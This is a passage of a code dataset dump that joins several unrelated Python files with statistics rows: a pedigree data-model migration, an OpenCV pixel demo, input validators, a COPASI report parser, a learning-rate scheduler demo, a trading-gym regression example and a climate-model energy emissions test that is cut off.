new_instance.ancestries = self.new_model.Ancestries()
if old_member.consanguineousParents is None:
new_instance.consanguineousParents = self.new_model.TernaryOption.unknown
if new_instance.disorderList is None:
new_instance.disorderList = []
return new_instance
def _migrate_hpo_term(self, old_term):
new_instance = self.convert_class(target_klass=self.new_model.HpoTerm, instance=old_term) # type: self.new_model.HpoTerm
new_instance.termPresence = self._migrate_ternary_option_to_boolean(ternary_option=old_term.termPresence)
return new_instance
def _migrate_ternary_option_to_boolean(self, ternary_option):
ternary_map = {
self.old_model.TernaryOption.no: False,
self.old_model.TernaryOption.yes: True,
}
return ternary_map.get(ternary_option, None)
def _migrate_affection_status(self, old_status):
status_map = {
self.old_model.AffectionStatus.AFFECTED: self.new_model.AffectionStatus.affected,
self.old_model.AffectionStatus.UNAFFECTED: self.new_model.AffectionStatus.unaffected,
self.old_model.AffectionStatus.UNCERTAIN: self.new_model.AffectionStatus.unknown,
}
return status_map.get(old_status, self.new_model.AffectionStatus.unknown)
def _migrate_life_status(self, old_status):
status_map = {
self.old_model.LifeStatus.ABORTED: self.new_model.LifeStatus.aborted,
self.old_model.LifeStatus.ALIVE: self.new_model.LifeStatus.alive,
self.old_model.LifeStatus.DECEASED: self.new_model.LifeStatus.deceased,
self.old_model.LifeStatus.UNBORN: self.new_model.LifeStatus.unborn,
self.old_model.LifeStatus.STILLBORN: self.new_model.LifeStatus.stillborn,
self.old_model.LifeStatus.MISCARRIAGE: self.new_model.LifeStatus.miscarriage,
}
return status_map.get(old_status, self.new_model.LifeStatus.alive)
def _migrate_adopted_status(self, old_status):
status_map = {
self.old_model.AdoptedStatus.notadopted: self.new_model.AdoptedStatus.not_adopted,
self.old_model.AdoptedStatus.adoptedin: self.new_model.AdoptedStatus.adoptedin,
self.old_model.AdoptedStatus.adoptedout: self.new_model.AdoptedStatus.adoptedout,
}
return status_map.get(old_status, self.new_model.AdoptedStatus.not_adopted)
def _migrate_person_karyotypic_sex(self, old_pks):
pks_map = {
self.old_model.PersonKaryotipicSex.UNKNOWN: self.new_model.PersonKaryotipicSex.unknown,
self.old_model.PersonKaryotipicSex.XX: self.new_model.PersonKaryotipicSex.XX,
self.old_model.PersonKaryotipicSex.XY: self.new_model.PersonKaryotipicSex.XY,
self.old_model.PersonKaryotipicSex.XO: self.new_model.PersonKaryotipicSex.XO,
self.old_model.PersonKaryotipicSex.XXY: self.new_model.PersonKaryotipicSex.XXY,
self.old_model.PersonKaryotipicSex.XXX: self.new_model.PersonKaryotipicSex.XXX,
self.old_model.PersonKaryotipicSex.XXYY: self.new_model.PersonKaryotipicSex.XXYY,
self.old_model.PersonKaryotipicSex.XXXY: self.new_model.PersonKaryotipicSex.XXXY,
self.old_model.PersonKaryotipicSex.XXXX: self.new_model.PersonKaryotipicSex.XXXX,
self.old_model.PersonKaryotipicSex.XYY: self.new_model.PersonKaryotipicSex.XYY,
self.old_model.PersonKaryotipicSex.OTHER: self.new_model.PersonKaryotipicSex.other,
}
return pks_map.get(old_pks)
def _migrate_sex(self, old_sex):
sex_map = {
self.old_model.Sex.MALE: self.new_model.Sex.male,
self.old_model.Sex.FEMALE: self.new_model.Sex.female,
self.old_model.Sex.UNKNOWN: self.new_model.Sex.unknown,
}
return sex_map.get(old_sex, self.new_model.Sex.undetermined)
| 56.982456
| 129
| 0.736761
| 768
| 6,496
| 5.924479
| 0.161458
| 0.072088
| 0.105495
| 0.074945
| 0.183956
| 0.104396
| 0.091648
| 0.069231
| 0.052088
| 0
| 0
| 0.003584
| 0.183805
| 6,496
| 113
| 130
| 57.486726
| 0.854583
| 0.024784
| 0
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091837
| false
| 0
| 0.030612
| 0
| 0.244898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
395f29ec9cf26aad90082c0bbf20534ee8f84d4b
| 788
|
py
|
Python
|
getting_setting.py
|
madhurgupta96/Image-Fundamentals-with-OpenCV
|
890fcce30155e98ab66e206c3511d77040570ec5
|
[
"Apache-2.0"
] | null | null | null |
getting_setting.py
|
madhurgupta96/Image-Fundamentals-with-OpenCV
|
890fcce30155e98ab66e206c3511d77040570ec5
|
[
"Apache-2.0"
] | null | null | null |
getting_setting.py
|
madhurgupta96/Image-Fundamentals-with-OpenCV
|
890fcce30155e98ab66e206c3511d77040570ec5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 15 23:52:04 2020
@author: Madhur Gupta
"""
from __future__ import print_function
import cv2
import argparse
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image',required=True,help='path to image')
args=vars(ap.parse_args())
image=cv2.imread(args['image'])
cv2.imshow("Original", image)
#setting 0,0 as red pixel
(b,g,r)=image[0,0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
image[0, 0] = (0, 0, 255)
(b, g, r) = image[0, 0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
#setting the corner of image as green
corner=image[0:100,0:100]
cv2.imshow('corner',corner)
image[0:100,0:100]=(0,255,0)
cv2.imshow('Updated',image)
cv2.waitKey(0)
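# Added illustration (not part of the original script): a hypothetical sketch
# showing that OpenCV images are plain NumPy arrays in BGR channel order, so
# pixel access and region assignment are ordinary array indexing. The blank
# image below is invented and needs no input file.
def _example_bgr_indexing():
    import numpy as np

    blank = np.zeros((100, 100, 3), dtype=np.uint8)
    blank[0:50, 0:50] = (0, 0, 255)  # top-left quadrant becomes red (B, G, R)
    b, g, r = blank[0, 0]
    return int(b), int(g), int(r)  # -> (0, 0, 255)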
| 22.514286
| 71
| 0.619289
| 132
| 788
| 3.643939
| 0.439394
| 0.033264
| 0.043659
| 0.033264
| 0.266112
| 0.266112
| 0.18711
| 0.18711
| 0.18711
| 0.18711
| 0
| 0.088685
| 0.170051
| 788
| 34
| 72
| 23.176471
| 0.646789
| 0.178934
| 0
| 0.222222
| 0
| 0
| 0.232172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
395f821293e57d64e71d8ac788f63dcdb5e4e300
| 3,815
|
py
|
Python
|
dictator/validators/base.py
|
brunosmmm/dictator
|
60314734b9d0c378fad77d296c8946165f372400
|
[
"MIT"
] | null | null | null |
dictator/validators/base.py
|
brunosmmm/dictator
|
60314734b9d0c378fad77d296c8946165f372400
|
[
"MIT"
] | null | null | null |
dictator/validators/base.py
|
brunosmmm/dictator
|
60314734b9d0c378fad77d296c8946165f372400
|
[
"MIT"
] | null | null | null |
"""Base validators."""
import re
from dictator.errors import ValidationError
from dictator.validators import Validator
from typing import Type, Callable, Any, Tuple, Union
HEX_REGEX = re.compile(r"^(0x)?([0-9A-Fa-f]+)$")
BIN_REGEX = re.compile(r"^(0b)?([0-1]+)$")
class ValidateType(Validator):
"""Type validator.
Validates that an object is of one of the expected Python types.
"""
_DEFAULT_NAME = "type"
def __init__(self, *_types: Type):
"""Initialize.
Parameters
----------
type
The expected python type
"""
super().__init__()
self._types = _types
@property
def target_types(self) -> Tuple[Type, ...]:
"""Get target type."""
return self._types
def validate(self, _value, **kwargs):
"""Perform validation."""
if not isinstance(_value, self.target_types):
raise ValidationError(f"value has unexpected type")
return _value
class ValidatorFactory(Validator):
"""Validator factory.
Create a validator class from a validation function.
"""
def __init__(self, validate_fn: Union[Callable, Validator], **kwargs):
"""Initialize.
Parameters
----------
validate_fn
Some callable that performs actual validation
"""
super().__init__(**kwargs)
if not callable(validate_fn):
raise TypeError("validate_fn must be callable")
if isinstance(validate_fn, Validator):
self._validatefn = validate_fn.validate
else:
self._validatefn = validate_fn
def validate(self, _value, **kwargs):
"""Perform validation."""
return self._validatefn(_value, **kwargs)
def _validate_integer(_value: Any, **kwargs: Any) -> int:
"""Validate integer value.
Parameters
----------
_value
Some value
kwargs
Other metadata
"""
if isinstance(_value, str):
# try converting
h = HEX_REGEX.match(_value)
b = BIN_REGEX.match(_value)
if h is not None:
if h.group(1) is None and b is not None:
# is actually binary
return int(h.group(2), 2)
return int(h.group(2), 16)
raise ValidationError("cannot validate as integer")
elif isinstance(_value, bool):
raise ValidationError("cannot validate as integer, got boolean")
elif isinstance(_value, int):
return _value
raise ValidationError("cannot validate as integer")
validate_string = ValidatorFactory(ValidateType(str))
validate_list = ValidatorFactory(ValidateType(tuple, list))
validate_dict = ValidatorFactory(ValidateType(dict))
validate_boolean = ValidatorFactory(ValidateType(bool))
validate_float = ValidatorFactory(ValidateType(float))
validate_integer = ValidatorFactory(_validate_integer)
validate_string_pre = ValidatorFactory(ValidateType(str), after_fn=False)
validate_list_pre = ValidatorFactory(ValidateType(tuple, list), after_fn=False)
validate_dict_pre = ValidatorFactory(ValidateType(dict), after_fn=False)
validate_boolean_pre = ValidatorFactory(ValidateType(bool), after_fn=False)
validate_float_pre = ValidatorFactory(ValidateType(float), after_fn=False)
validate_integer_pre = ValidatorFactory(_validate_integer, after_fn=False)
def validate_null(_value: Any, **kwargs: Any) -> None:
"""Validate null value.
Parameters
----------
_value
Some value
kwargs
Other metadata
"""
if _value is not None:
raise ValidationError("value is not null")
return _value
DEFAULT_VALIDATOR_BY_TYPE = {
int: validate_integer,
str: validate_string,
list: validate_list,
dict: validate_dict,
bool: validate_boolean,
float: validate_float,
}
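# Added illustration (not part of the original module): a hypothetical sketch of
# how the factory-built validators behave. Values are invented; each validator
# returns the (possibly converted) value or raises ValidationError.
def _example_validator_usage():
    assert validate_integer.validate("0x1F") == 31  # hex strings are converted
    assert validate_integer.validate("0b101") == 5  # binary strings are converted
    assert validate_integer.validate(42) == 42
    assert validate_string.validate("hello") == "hello"
    try:
        validate_boolean.validate("not a bool")
    except ValidationError:
        pass  # non-bool values are rejected
    return True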
| 27.644928
| 79
| 0.654522
| 419
| 3,815
| 5.732697
| 0.257757
| 0.11657
| 0.029975
| 0.041632
| 0.144463
| 0.131141
| 0.077435
| 0.041632
| 0.041632
| 0
| 0
| 0.004122
| 0.236959
| 3,815
| 137
| 80
| 27.846715
| 0.821024
| 0.158322
| 0
| 0.104478
| 0
| 0
| 0.066978
| 0.006998
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104478
| false
| 0
| 0.059701
| 0
| 0.313433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3960d947244ab5cacdb399b505a02597c36f0c4b
| 554
|
py
|
Python
|
copasi_test/ReportParserMoieties.py
|
copasi/python-copasi-testsuite
|
604ce52f95b4a0e2631712b22c331cd8c263bd05
|
[
"Artistic-2.0"
] | null | null | null |
copasi_test/ReportParserMoieties.py
|
copasi/python-copasi-testsuite
|
604ce52f95b4a0e2631712b22c331cd8c263bd05
|
[
"Artistic-2.0"
] | null | null | null |
copasi_test/ReportParserMoieties.py
|
copasi/python-copasi-testsuite
|
604ce52f95b4a0e2631712b22c331cd8c263bd05
|
[
"Artistic-2.0"
] | null | null | null |
from .ReportParser import ReportParser
class ReportParserMoieties(ReportParser):
def __init__(self):
ReportParser.__init__(self)
def parseLines(self, lines):
# type: ([str]) -> None
current = self.skip_until(lines, 0, 'Link matrix(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
current = self.skip_until(lines, current, 'Stoichiometry(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
| 29.157895
| 71
| 0.628159
| 55
| 554
| 6.145455
| 0.454545
| 0.130178
| 0.088757
| 0.118343
| 0.508876
| 0.360947
| 0.360947
| 0.360947
| 0.360947
| 0.360947
| 0
| 0.007353
| 0.263538
| 554
| 18
| 72
| 30.777778
| 0.821078
| 0.037906
| 0
| 0.461538
| 0
| 0
| 0.06403
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.076923
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
396309f795615e199934ec29198bf8e06add077e
| 1,087
|
py
|
Python
|
relationship_classifiction/test.py
|
suolyer/PyTorch_BERT_Pipeline_IE
|
869a1fc937e268a565f5b30a2105a460b4e07f59
|
[
"MIT"
] | 8
|
2021-05-23T02:04:09.000Z
|
2022-01-14T08:58:42.000Z
|
relationship_classifiction/test.py
|
2019hong/PyTorch_BERT_Pipeline_IE
|
9ee66bc9ceaed42e996e9b2414612de3fc0b23bb
|
[
"MIT"
] | 2
|
2021-05-14T00:34:45.000Z
|
2021-08-08T08:36:33.000Z
|
relationship_classifiction/test.py
|
2019hong/PyTorch_BERT_Pipeline_IE
|
9ee66bc9ceaed42e996e9b2414612de3fc0b23bb
|
[
"MIT"
] | 1
|
2021-09-28T15:15:44.000Z
|
2021-09-28T15:15:44.000Z
|
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import CosineAnnealingLR, CosineAnnealingWarmRestarts
import itertools
import matplotlib.pyplot as plt
initial_lr = 0.1
class model(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3)
def forward(self, x):
pass
net_1 = model()
optimizer_1 = torch.optim.Adam(net_1.parameters(), lr=initial_lr)
scheduler_1 = CosineAnnealingWarmRestarts(optimizer_1, T_0=1)
print("初始化的学习率:", optimizer_1.defaults['lr'])
lr_list = []  # keep every learning rate that was used so we can plot how it changes later
for epoch in range(0, 6):
# train
for i in range(int(30000/32)):
optimizer_1.zero_grad()
optimizer_1.step()
print("第%d个epoch的学习率:%f" % (epoch, optimizer_1.param_groups[0]['lr']))
lr_list.append(optimizer_1.param_groups[0]['lr'])
scheduler_1.step((epoch+i+1)/int(30000/32))
# Plot how the learning rate changes
plt.plot(lr_list)
plt.xlabel("epoch")
plt.ylabel("lr")
plt.title("learning rate's curve changes as epoch goes on!")
plt.show()
| 24.155556
| 83
| 0.689052
| 159
| 1,087
| 4.509434
| 0.484277
| 0.097629
| 0.033473
| 0.058577
| 0.066946
| 0.066946
| 0
| 0
| 0
| 0
| 0
| 0.043527
| 0.175713
| 1,087
| 44
| 84
| 24.704545
| 0.756696
| 0.032199
| 0
| 0
| 0
| 0
| 0.080229
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0.034483
| 0.172414
| 0
| 0.275862
| 0.068966
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
39642b71284a9db7523df49c8dca22286f61d556
| 1,236
|
py
|
Python
|
examples/linear_regression/01_linear_regression.py
|
zhaoshiying97/trading_gym
|
d4af8d724efa17420e6ebb430f6f9d4f08c6f83a
|
[
"Apache-2.0"
] | 32
|
2019-12-06T19:23:51.000Z
|
2022-03-08T06:08:58.000Z
|
examples/linear_regression/01_linear_regression.py
|
zhaoshiying97/trading_gym
|
d4af8d724efa17420e6ebb430f6f9d4f08c6f83a
|
[
"Apache-2.0"
] | 2
|
2020-02-20T11:04:07.000Z
|
2020-03-12T08:47:54.000Z
|
examples/linear_regression/01_linear_regression.py
|
zhaoshiying97/trading_gym
|
d4af8d724efa17420e6ebb430f6f9d4f08c6f83a
|
[
"Apache-2.0"
] | 15
|
2019-12-12T07:43:34.000Z
|
2022-03-06T13:02:39.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pdb
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from trading_gym.utils.data.toy import create_toy_data
from trading_gym.envs.portfolio_gym.portfolio_gym import PortfolioTradingGym
order_book_id_number = 100
toy_data = create_toy_data(order_book_ids_number=order_book_id_number, feature_number=10, start="2019-05-01", end="2019-12-12", frequency="D")
env = PortfolioTradingGym(data_df=toy_data, sequence_window=1, add_cash=False)
state = env.reset()
while True:
next_state, reward, done, info = env.step(action=None)
label = info["one_step_fwd_returns"]
print(state)
print(label)
#
regressor = LinearRegression()
regressor.fit(state.values, label.values)
#display and store
print(regressor.coef_)
env.experience_buffer["coef"].append(regressor.coef_)
#
if done:
break
else:
state = next_state
#
factor_returns = pd.DataFrame(np.array(env.experience_buffer["coef"]), index=env.experience_buffer["dt"], columns=toy_data.columns[:-1])
cum_factor_returns = (factor_returns +1).cumprod()
cum_factor_returns.plot(title="Cumulative Factor Return",linewidth=2.2)
| 30.9
| 142
| 0.741909
| 176
| 1,236
| 4.977273
| 0.534091
| 0.039954
| 0.065068
| 0.038813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02639
| 0.141586
| 1,236
| 39
| 143
| 31.692308
| 0.799246
| 0.048544
| 0
| 0
| 0
| 0
| 0.064157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.230769
| 0
| 0.230769
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3968419bade051f1706f219d6c57e614a8cbfb88
| 49,588
|
py
|
Python
|
climateeconomics/tests/_l1_test_energy_global_values.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-01-14T06:37:42.000Z
|
2022-01-14T06:37:42.000Z
|
climateeconomics/tests/_l1_test_energy_global_values.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
climateeconomics/tests/_l1_test_energy_global_values.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
Copyright (C) 2020 Airbus SAS
'''
import unittest
import time
import numpy as np
import pandas as pd
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from climateeconomics.sos_processes.iam.witness.witness_dev.usecase_witness import Study as Study_open
class TestGlobalEnergyValues(unittest.TestCase):
"""
This test class checks the order of magnitude of some key 2020 values in the energy models.
All the data are taken either from ourworldindata:
Hannah Ritchie, Max Roser and Pablo Rosado (2020) - "Energy". Published online at OurWorldInData.org.
Retrieved from: 'https://ourworldindata.org/energy' [Online Resource]
Or from IEA:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
"""
def setUp(self):
'''
Initialize third data needed for testing
'''
self.dirs_to_del = []
self.namespace = 'MyCase'
self.study_name = f'{self.namespace}'
self.name = 'Test'
self.energymixname = 'EnergyMix'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
builder = self.ee.factory.get_builder_from_process(
repo, 'witness_dev')
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
usecase = Study_open(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
self.ee.display_treeview_nodes()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
self.ee.load_study_from_input_dict(full_values_dict)
# def test_01_check_global_production_values(self):
# '''
# Test order of magnitude of raw energy production with values from ourworldindata
# https://ourworldindata.org/energy-mix?country=
#
# '''
# self.ee.execute()
#
# # These emissions are in Gt
# energy_production = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
#
# '''
# Theory in 2019 from ourworldindata expressed in TWh (2020 is a covid year)
# we need to subtract energy own use to get the same hypothesis as our models (energy own_use is subtracted from raw production)
# '''
# oil_product_production = 49472. - 2485.89
# wind_production = 1590.19 # in 2020
# nuclear_production = 2616.61
# hydropower_production = 4355.
# trad_biomass_production = 13222.
# other_renew_production = 1614.
# modern_biofuels_production = 1043. # in 2020
# # in 2020
# # https://ourworldindata.org/renewable-energy#solar-energy-generation
# solar_production = 844.37
# coal_production = 43752. - 952.78
# gas_production = 39893. - 3782.83
# total_production = 171240.
#
# '''
# Oil production
# '''
#
# computed_oil_production = energy_production['production fuel.liquid_fuel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_oil_production,
# oil_product_production * 1.1)
# self.assertGreaterEqual(
# computed_oil_production, oil_product_production * 0.9)
#
# '''
# Gas production
# '''
# fossil_gas_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.methane.FossilGas.techno_production')
# computed_gas_production = fossil_gas_prod['methane (TWh)'].loc[
# fossil_gas_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_gas_production,
# gas_production * 1.1)
# self.assertGreaterEqual(
# computed_gas_production, gas_production * 0.9)
#
# '''
# Coal production
# '''
# coal_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.CoalExtraction.techno_production')
# computed_coal_production = coal_prod['solid_fuel (TWh)'].loc[
# coal_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_coal_production,
# coal_production * 1.1)
# self.assertGreaterEqual(
# computed_coal_production, coal_production * 0.9)
#
# '''
# Biomass production: the value is traditional biomass consumption, but we know that we do not consume all the biomass that we can produce
# Waiting for a specific value to compare
# '''
# #
# computed_biomass_production = energy_production['production biomass_dry (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biomass_production,
# trad_biomass_production * 1.1)
# self.assertGreaterEqual(
# computed_biomass_production, trad_biomass_production * 0.9)
#
# '''
# Biofuel production
# '''
#
# computed_biodiesel_production = energy_production['production fuel.biodiesel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biogas_production = energy_production['production biogas (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biofuel_production = computed_biodiesel_production + \
# computed_biogas_production
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biofuel_production,
# modern_biofuels_production * 1.1)
# # we compare in TWh and must be near 30% of error because some biofuels
# # are missing
# self.assertGreaterEqual(
# computed_biofuel_production, modern_biofuels_production * 0.7)
#
# '''
# Solar production
# '''
# elec_solar_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
#
# elec_solarth_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
#
# computed_solar_production = elec_solar_prod['electricity (TWh)'].loc[
# elec_solar_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_solarth_prod['electricity (TWh)'].loc[
# elec_solarth_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_solar_production,
# solar_production * 1.1)
# self.assertGreaterEqual(
# computed_solar_production, solar_production * 0.9)
#
# '''
# Wind production
# '''
# elec_windonshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
# elec_windoffshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
#
# computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
# elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_windoffshore_prod['electricity (TWh)'].loc[
# elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_wind_production,
# wind_production * 1.1)
# self.assertGreaterEqual(
# computed_wind_production, wind_production * 0.9)
#
# '''
# Nuclear production
# '''
# elec_nuclear_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
#
# computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
# elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_nuclear_production,
# nuclear_production * 1.1)
# self.assertGreaterEqual(
# computed_nuclear_production, nuclear_production * 0.9)
#
# '''
# Hydropower production
# '''
# elec_hydropower_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
#
# computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
# elec_hydropower_prod['years'] == 2020].values[0] * 1000
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_hydropower_production,
# hydropower_production * 1.1)
# self.assertGreaterEqual(
# computed_hydropower_production, hydropower_production * 0.9)
def test_02_check_global_co2_emissions_values(self):
'''
Test order of magnitude of co2 emissions with values from ourworldindata
https://ourworldindata.org/emissions-by-fuel
'''
self.ee.execute()
# These emissions are in Gt
co2_emissions_by_energy = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.co2_emissions_by_energy')
'''
Theory in 2020 from ourworldindata expressed in Mt
'''
oil_co2_emissions = 11.07e3 # expressed in Mt
coal_co2_emissions = 13.97e3 # expressed in Mt
gas_co2_emissions = 7.4e3 # expressed in Mt
total_co2_emissions = 34.81e3 # billions tonnes
'''
Methane CO2 emissions are emissions from methane energy + gasturbine from electricity
'''
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_detailed_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_detailed_production')
wgs_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.WaterGasShift.techno_detailed_production')
computed_methane_co2_emissions = co2_emissions_by_energy['methane'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_gt_prod['CO2 from Flue Gas (Mt)'].loc[elec_gt_prod['years']
== 2020].values[0] +\
elec_cgt_prod['CO2 from Flue Gas (Mt)'].loc[elec_gt_prod['years']
== 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.75
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_methane_co2_emissions,
gas_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_methane_co2_emissions, gas_co2_emissions * 0.9)
print(
f'Methane CO2 emissions : ourworldindata {gas_co2_emissions} Mt vs WITNESS {computed_methane_co2_emissions} TWh')
'''
Coal CO2 emissions are emissions from coal energy + CoalGen from electricity + SMR
'''
elec_coal_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_detailed_production')
computed_coal_co2_emissions = co2_emissions_by_energy['solid_fuel'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_coal_prod['CO2 from Flue Gas (Mt)'].loc[elec_coal_prod['years']
== 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.25
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_coal_co2_emissions,
coal_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_coal_co2_emissions, coal_co2_emissions * 0.9)
print(
f'Coal CO2 emissions : ourworldindata {coal_co2_emissions} Mt vs WITNESS {computed_coal_co2_emissions} Mt')
'''
Oil CO2 emissions are emissions from oil energy
'''
computed_oil_co2_emissions = co2_emissions_by_energy['fuel.liquid_fuel'].loc[
co2_emissions_by_energy['years'] == 2020].values[0]
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_oil_co2_emissions,
oil_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_oil_co2_emissions, oil_co2_emissions * 0.9)
print(
f'Oil CO2 emissions : ourworldindata {oil_co2_emissions} Mt vs WITNESS {computed_oil_co2_emissions} Mt')
'''
Total CO2 emissions are the sum of all CO2 emission sources minus the CO2 removed by the energy mix (sinks)
'''
sources = self.ee.dm.get_value(
'Test.CCUS.CO2_emissions_by_use_sources')
sinks = self.ee.dm.get_value('Test.CCUS.CO2_emissions_by_use_sinks')[
'CO2_resource removed by energy mix (Gt)'].values[0]
sources_sum = sources.loc[sources['years'] == 2020][[
col for col in sources.columns if col != 'years']].sum(axis=1)[0]
computed_total_co2_emissions = (sources_sum - sinks) * 1000
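# CO2 sources and sinks are expressed in Gt; the factor 1000 converts the balance to Mt for the comparison below.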
